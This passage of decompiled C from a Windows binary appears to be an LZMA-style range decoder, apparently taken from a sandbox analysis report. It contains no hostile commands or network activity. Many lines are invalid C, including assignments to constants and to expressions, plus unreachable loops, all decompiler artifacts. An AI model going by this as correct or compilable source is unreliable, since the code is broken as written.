												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
